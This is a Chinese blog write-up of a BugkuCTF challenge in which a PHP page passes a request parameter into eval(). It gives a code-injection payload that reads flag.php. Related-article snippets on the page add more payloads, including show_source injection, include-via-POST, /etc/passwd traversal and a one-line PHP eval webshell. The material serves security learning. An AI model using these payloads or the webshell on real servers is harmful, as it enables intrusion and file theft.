BugkuCTF文件包含漏洞

最新推荐文章于 2024-07-13 15:12:45 发布
最新推荐文章于 2024-07-13 15:12:45 发布
阅读量1.4k 收藏 3
点赞数 1
分类专栏: CTF 文章标签: BugkuCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sandra_93/article/details/83062955
版权
本文介绍了BugkuCTF中一个涉及文件包含漏洞的挑战,重点讨论了`eval()`函数的使用、URL标识符的意义、`print_r`函数的作用,以及在HTTP请求中如何绕过关键词拦截执行系统命令。通过分析和构造payload,揭示了如何利用这些知识进行漏洞利用。
摘要由CSDN通过智能技术生成

虽然是参考别人的,但是,为了能够灵活使用工具啥的,拓展一下还是每天来一题CTF吧。
writeup正版点这里

题目所给的代码块

 <?php
    include "flag.php";
    $a = @$_REQUEST['hello'];
    eval( "var_dump($a);");
    show_source(__FILE__);
?>

分析代码:

eval() 函数用来执行一个字符串表达式,并返回表达式的值。
eval 函数的功能就是讲一个字符串当作 php 的代码进行执行
比如在python环境里

n=2
eval("n+2")
返回的就是4

flag的取得来源:在url里输入“

 ?hello=$a);print_r(file("./flag.php")); //

对writeup进行深入探测:
第一点:url里的一些标识符

$
一般来说代表变量,$a表示变量a

:在url里起连接作用,以及清除缓存的作用(加了&

最低0.47元/天 解锁文章
Sandra_93
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
渗透漏洞 Bugku-Web4
weixin_52514668的博客
04-29 290
Bugku-Web4一. 开启环境,打开链接二. ctrl+u查看源代码三. 下载Hackbar组件四. 返回源代码页面,打开Hackbar五. 输入URL,传递post=what六. 得到flag 一. 开启环境,打开链接 二. ctrl+u查看源代码 查看源代码就会发现POST方式传递的——解决方法:下载Hackbar组件 三. 下载Hackbar组件 四. 返回源代码页面,打开Hackbar 五. 输入URL,传递post=what 六. 得到flag ...
BUGKU /.-
m0_52920608的博客
01-31 665
1.题目描述: …-./.-…/.-/–./----.–/-…/…–/…-./-.-./-…/…-./.----/–…/…-./----./…–/----./----./…/-----/…-/-----.- 2.联想到摩斯密码,于是复制粘贴到https://www.atool99.com/morse.php进行解密得到: 将大写全部改为小写,,%u7d改为{和}得到正确flag ...
CTF文件包含篇 与 php文件包含
最新发布
2301_81556781的博客
07-13 716
phpMyAdmin是开源的MYSQL数据库管理工具 4.8.0~4.8.1index.php界面存在文件包含功能,代码分析进行绕过可实现漏洞利用。
文件包含漏洞 基础
weixin_50464560的博客
03-21 960
CTF文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
ctf文件包含漏洞(一)
wlllllianqing的博客
10-06 2233
文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞 相关函数: include() include_once() require() require_once() (未完持续…) ...
BugkuCTF-文件包含
臭nana的博客
11-27 522
方法一:eval存在命令执行漏洞,使用hello构造payload http://123.206.87.240:8003/?hello=1);show_source(%27flag.php%27);var_dump(3 方法二:构造伪协议 http://123.206.87.240:8003/?hello=1);include $_POST['f'];// 在POST区域:f=php...
CTF文件包含漏洞总结
热门推荐
Lethe's Blog
02-13 5万+
CTF文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
Bugku CTF梳理
lin的博客
04-10 1288
大佬的刷题记录:https://blog.csdn.net/mcmuyanga 1.CTF常见题型 CTF比赛通常包含的题目类型有七种,包括MISC、PPC、CRYPTO、PWN、REVERSE、WEB、STEGA。 MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 PPC(Professionally Program Coder)类型,即编程类题目,题目涉及到编程算法,相比ACM较为容易。 CRYPTO(Cryptography)
Bugku Web CTF-文件包含2
No Title
12-31 457
Bugku Web CTF-文件包含2 打开是一个页面,题目提示是文件包含,url的格式也很典型: http://123.206.31.85:49166/index.php?file=hello.php 尝试最简单的思路http://123.206.31.85:49166/index.php?file=../../../../../../../../../etc/pass,然后页面显示大字NA...
BugkuCTF-WEB题文件上传
am_03的博客
09-08 1885
启动场景 发现是文件上传 只能上传图像,不能上传PHP文件,那应该是寻找漏洞上传PHP文件 PHP文件里写入一句话木马 <?php @eval($_POST[caidao]);?> 使用burp抓包,不断尝试发现发现需要修改的地方有三个: 一个是http head里的Content-Type: multipart/form-data; 请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data (其t为大写) Multipart里的部分字母
BugkuCTF练习题解——Web一
qq_41739275的博客
08-24 6561
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
文件包含BUGKU BUUCTF
zbbjya的博客
03-16 252
查看源代码 图片显示为文件包含 抓了一下包没啥发现 改了一下头,使用php://input 好像也没有什么用 说明这样的方式是不对的php伪协议 有 php://input 伪协议相当于一个削弱post的方法 php://filter可以获取指定文件源码,php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西; 然后我们试试用这个 具体用法可看 https://blog.csdn.ne
bugkuctf 文件包含2 writeup
wuerror的博客
08-07 1572
  首先看网页源代码,发现 访问upload.php,进入上传页面。     要求上传图片,开始构造一句话图片马。因为初学,一句话不太熟只知道 &lt;?php @eval($_post[a]);?&gt;   把这句话加在图片(改为txt格式)的最后,再改回jpg。上传之后访问该图的存储路径,发现post数据没有反应。显示出来的我的"一句话"语句好像两头被转义了。想了好久不知道怎么办,...
CTFDay9 文件包含漏洞
qq_53525138的博客
05-04 177
CTFDay9 文件包含漏洞 漏洞原理 文件包含漏洞:即file inclusion,意思是文件包含,是指服务器开启alloww_url_include、allow_url_fopen选项时,就可以通过php的include(),include_once(),require(),require_once() 函数利用url去动态包含文件,如果没有对文件来源进行严格审查,就会导致恶意文件被读取或者执行。 漏洞类型 本地文件包含(LFI):被包含文件在服务器本地,执行方式为下图左上角url 远程文件包含(R
CTF题】使用文件包含漏洞读取网页代码
keysking瞎写东西的地方
01-25 2万+
CTF题】使用文件包含漏洞读取网页代码按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。1.直接包含内有运行代码的文件比如有一index.php<?php include $_GET['file']; ?>那么就可以通过抓包修改file值的办法去运行一些本来不该运行
Bugku之文件包含
金 帛的博客
02-15 806
BugkuWP
文件包含漏洞
pie002的博客
04-22 942
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少代码冗余,降低代码后期维护难度。保证网站整体风格统一。
ctf文件包含漏洞题目
10-14
好的,关于ctf文件包含漏洞题目,我可以给你一些简单的解释和例子。 ctf文件包含漏洞是指在程序中存在文件包含功能,但是由于没有对用户输入进行过滤或者限制,导致攻击者可以通过构造恶意输入来读取、执行或者删除任意文件,从而实现攻击的目的。 例如,在一个网站中存在一个文件包含功能,用户可以通过输入一个文件名来读取该文件的内容。但是如果程序没有对用户输入进行过滤或者限制,攻击者可以通过构造恶意输入来读取任意文件,比如 /etc/passwd 文件,从而获取系统中的敏感信息
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值